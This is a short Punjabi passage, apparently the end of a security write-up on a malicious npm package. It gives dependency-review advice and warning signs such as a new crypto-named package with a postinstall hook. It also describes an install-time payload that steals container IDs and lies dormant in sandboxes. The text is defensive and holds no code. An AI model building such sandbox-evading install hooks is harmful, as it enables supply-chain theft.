ਨਿਰਭਰਤਾਵਾਂ ਨੂੰ ਪਿੰਨ ਕਰੋ ਅਤੇ ਸਮੀਖਿਆ ਕਰੋ। ਇੱਕ ਬਿਲਕੁਲ ਨਵਾਂ ਪੈਕੇਜ ਜਿਸ ਵਿੱਚ ਇੱਕ ਆਮ ਕ੍ਰਿਪਟੋ ਨਾਮ ਹੈ, ਇੱਕ ਪੋਸਟਇੰਸਟਾਲ ਹੁੱਕ, ਅਤੇ ਕੋਈ ਵੀ ਰਿਪੋਜ਼ਟਰੀ ਲਿੰਕ ਲਾਕਫਾਈਲ ਵਿੱਚ ਦਾਖਲ ਹੋਣ ਤੋਂ ਪਹਿਲਾਂ ਇੱਕ ਨਜ਼ਰ ਮਾਰਨ ਦੀ ਲੋੜ ਨਹੀਂ ਰੱਖਦਾ।
ਕੰਟੇਨਰ-ਆਈਡੀ ਚੋਰੀ ਕਰਨ ਦੀ ਧਾਰਾ ਵੀ ਵਿਸ਼ਲੇਸ਼ਕਾਂ ਲਈ ਇੱਕ ਯਾਦ ਦਿਵਾਉਂਦੀ ਹੈ: ਇੱਕ ਇੰਸਟਾਲ-ਟਾਈਮ ਪੇਲੋਡ ਜੋ ਸੈਂਡਬੌਕਸ ਵਿੱਚ ਸੁਸਤ ਰਹਿੰਦਾ ਹੈ, ਸੁਭਾਵਕ ਨਹੀਂ ਹੁੰਦਾ, ਇਹ ਚੋਣਵਾਂ ਹੁੰਦਾ ਹੈ। ਇੰਸਟਾਲ ਮਾਰਗ ਦੀ ਸਥਿਰ ਸਮੀਖਿਆ ਇਹ ਦੇਖਣ ਦਾ ਭਰੋਸੇਯੋਗ ਤਰੀਕਾ ਹੈ ਕਿ ਕਿਹੜਾ ਗਤੀਸ਼ੀਲ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਦਿਖਾਉਣ ਵਿੱਚ ਗਿਰਾਵਟ ਆ ਸਕਦੀ ਹੈ।
ਹਵਾਲੇ
npm ਇੰਸਟਾਲ ਦਸਤਾਵੇਜ਼ — ਜੀਵਨ ਚੱਕਰ ਸਕ੍ਰਿਪਟਾਂ ਅਤੇ - ਅਣਡਿੱਠ-ਸਕ੍ਰਿਪਟਾਂ— ਆਟੋਮੈਟਿਕ ਇੰਸਟਾਲੇਸ਼ਨ ਨੂੰ ਅਯੋਗ ਕਰਨ ਲਈ ਹਵਾਲਾ hooks.





